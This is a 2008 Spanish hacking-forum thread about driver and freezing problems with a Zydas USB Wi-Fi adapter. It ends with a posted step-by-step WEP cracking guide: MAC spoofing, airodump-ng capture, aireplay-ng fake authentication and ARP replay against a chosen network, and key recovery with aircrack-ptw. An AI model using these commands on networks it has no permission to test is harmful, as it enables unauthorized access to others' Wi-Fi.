elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

Inicio Ayuda Ingresar Registrarse
11 Octubre 2008, 04:09  

+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking Wireless
| | |-+  Wireless en Linux (Moderadores: rh3nt0n, longits, pianista, *dudux, ChimoC, KARR)
| | | |-+  advertencia zydas 1211 usb
Páginas: [1] Ir Abajo Imprimir
Autor Tema: advertencia zydas 1211 usb  (Leído 546 veces)
rolo32

Desconectado Desconectado

Ver Perfil
advertencia zydas 1211 usb
« en: 03 Julio 2008, 12:32 »

compré el usb zydas de esta web
http://seguridadwireless.comprawifi.com/adaptadores/usb-wireless-54mbps-802-11g-chipset-zydas-antena-rp-sma-modo-monitor-solo-en-linux-/prod_17.html
que va con su cd de drivers y al usarlo en  live cd wifiway 0.8 y lanzarle un iwconfig en managed o en monitor me lanza todo normal....pero encima de la interfaz de la tarjeta, que la reconoce como eth1 me sale un warning como este....

driver for device white has been compiled with version 22 of wireless extension, while this program suports up to version 20.Some things may be broken...
a la tarjeta le cuesta bastante pillar arp con airoscript porque parece que se desasocia y tengo que volver a asociar
y ademas no hay manera de conectarme a internet....me lanza un error como este
error for wireless request  "set frequency" (8B04)  :
SET failed on device eth1  ;  operation not permitted

por que me pasa esto?
cPositron

Ver Perfil
Re: advertencia zydas 1211 usb
« Respuesta #1 en: 03 Julio 2008, 13:00 »

yo tengo una Zydas USB con el modulo zd1211rw .

creo q me pasa algo parecido a ti, cuando me pongo a capturar con el Airodumb al rato de empezar se congela y no me sigue capturando :S

todo normal, modo moitor ... empiezo a capturar .. y de repente , a los 40 " ahi se me queda.
rolo32

Ver Perfil
« Respuesta #2 en: 03 Julio 2008, 13:21 »

el problema de la version 22 traducido dice algo asi como que el programa solo soporta hasta la version 20 verdad?.....que hago? :-(
KARR
Moderador

Jugando con mi amigo wifi...

Ver Perfil
« Respuesta #3 en: 03 Julio 2008, 13:41 »

Yo zydas no tengo ni nunca la probé  :-[ , pero pienso que cuando se cuelgue haría lo siguiente :

Código:
ifconfig eth1 down

Código:
ifconfig eth1 up

Y volver a lanzar airodump-ng , despues , lanzaría aircrack-ng contra todas las capturas

Un saludo ::) ::)

WannaBeHacker

Ver Perfil
« Respuesta #4 en: 03 Julio 2008, 13:58 »

Yo también tengo un Zydas y me ocurre también con WifiSlax, (que se cuelga y no sigue capturando) pero en cambio, no me ocurre en UBUNTU.
Aunque lo reinicies, sigue ocurriendo.

http://imagenes.mregidor.es
Simplemente, otro hosting de imágenes.
Como imageshack pero todas las opciones gratis
rolo32

Ver Perfil
« Respuesta #5 en: 03 Julio 2008, 14:14 »

y sobre esto?
y ademas no hay manera de conectarme a internet....me lanza un error como este...

error for wireless request  "set frequency" (8B04)  :
SET failed on device eth1  ;  operation not permitted
rolo32

Ver Perfil
« Respuesta #6 en: 04 Julio 2008, 04:31 »

probado con comandos en 0.8 y asocia perfecta...y en la 1.0beta2 navego sin problemas, eso si pasando de ponerle chanel o frequency(esto también lo tengo que probar en ww 0.8 y wifislax 3.1)
*dudux
Moderador

.....traficando con sueños.....

Ver Perfil
« Respuesta #7 en: 04 Julio 2008, 10:53 »

probado con comandos en 0.8 y asocia perfecta...y en la 1.0beta2 navego sin problemas, eso si pasando de ponerle chanel o frequency(esto también lo tengo que probar en ww 0.8 y wifislax 3.1)

ya somos 2............con comandos no falla.....................siempre puede "congelarse", recordar que zd1211rw son las nuevas atheros de madwifi., sabeis que los madwifi hay bajarlos y subirlos pq la pantralla queda negra.........zydas =

Visita ....................    http://217.125.24.22/
Punisher.linux

Ver Perfil
« Respuesta #8 en: 04 Julio 2008, 10:57 »

A mi me pasa exactamente lo mismo, aunque nunca probe con comandos hay alguna guia para ahcerlo con comandos?
rolo32

Ver Perfil
« Respuesta #9 en: 04 Julio 2008, 12:06 »

lo guardé en un txt.....te lo pongo

Paso-1/1
 Abrimos un terminal y tecleamos:
iwconfig
Localizo donde aparece mi USB (en este caso es eth2)En todos los pasos de este tutorial donde aparece eth2 cada cual que escriba el sitio donde aparezca su tarjeta, bien sea < lo >,< eth >,< eth1 > ó < eth2 >
lo             no wireless extensions
eth           no wireless extensions
eth1         no wireless extensions
eth2         EEE 802.11b/g    ESSID: pf/any NIckname : "zd1211b"  Encryption key :of
                Link Quality:0 Signel level:0 Noise level:0
                Rx invalid nwid:0   Rx invalid crypt:0   Rx invalid frag:0
                Tx excessive retries:0  Invalid misc:0  Missed beacon: 0

si no os aparece nada sobre buestra usb ó tarjeta, es que esta down y hay que ponerla up y se pone con el siguiente comando:

ifconfig eth2 up

Paso-2
Abrimos otro terminal y tecleamos:

macchanger -m 00:11:22:33:44:55 eth2

Esto es para cambiar nuestra MAC.Ahora nuestra MAC aparecera con la numeración que hemos metido 00:11:22:33:44:55

Paso-1/2
Volvemos al terminal del Paso-1 y tecleamos:

airodump-ng eth2

Una vez aparezcan los BSSID anotamos el que nos interesa ( siempre que sea wep) pulsamos CTRL+C para parar el proceso.

Paso-1/3
tecleamos:

airodump-ng -c 6 -w tako eth2
Ahora empezamos a capturar paquetes.

Paso-3/1
Abrimos otra terminal y tecleamos:

ifconfig

Cogemos la MAC de tu eth2. Los 12 primeros números de HWaddr:  00:11:22:33:44:55
En este caso saldrían estos números que son los que cambiamos en el Paso-2 por nuestra MAC real.

Paso-3/2
Tecleamos:

aireplay-ng -1 0 -e WLAN_XX -a XX:XX:XX:XX:XX:XX -h 00:11:22:33:44:55 eth2

Si el nivel de señal no es relativamente bueno, no asocia. Es cuestión de mover la antena o el usb viendo dónde coge mejor la señal que te interese, y de tener paciencia.
Puedes probar la opción -o. A veces funciona mejor:

aireplay-ng -1 30 -o 1 -e WLAN_XX -a XX:XX:XX:XX:XX:XX -h 00:11:22:33:44:55 eth2
.
Paso -4
Abrimos otro terminal y tecleamos:

aireplay-ng -3 -b XX:XX:XX:XX:XX:XX  -h 00:11:22:33:44:55 eth2

Hecho esto los paquetes(#Data) en la terminal donde tenemos al airodump deberán de empezar a subir para el Access Point elegido.Esperamos a que junte un mínimo de 30,000 #Data. Cuando este por encima de ese valor, ejecutamos:
Paso-5

aircrack-ptw tako-01.cap

En unos instantes te deberá aparecer la clave, en el renglón que diga Found Key. Si no aparece espera a que junte más paquetes y vuelve a ejecutar este último comando. Puede llegar a requerir hasta 100,000 o más.

(El orden sería.... 1º localizar el USB; 2º cambio de MAC; 3º airodump-ng, 4º aireplay-ng, 5º aircrack)
Páginas: [1] Ir Arriba Imprimir 
Ir a:  

Consolas     La Web de Goku     MilW0rm     MundoDivx

Hispabyte     Truzone     TodoReviews     ZonaPhotoshop

hard-h2o modding    Foros de ayuda    Yashira.org    Videojuegos    indetectables.net   

Noticias Informatica    Seguridad Informática    ADSL    Foros en español    eNYe Sec

Todas las webs afiliadas están libres de publicidad engañosa.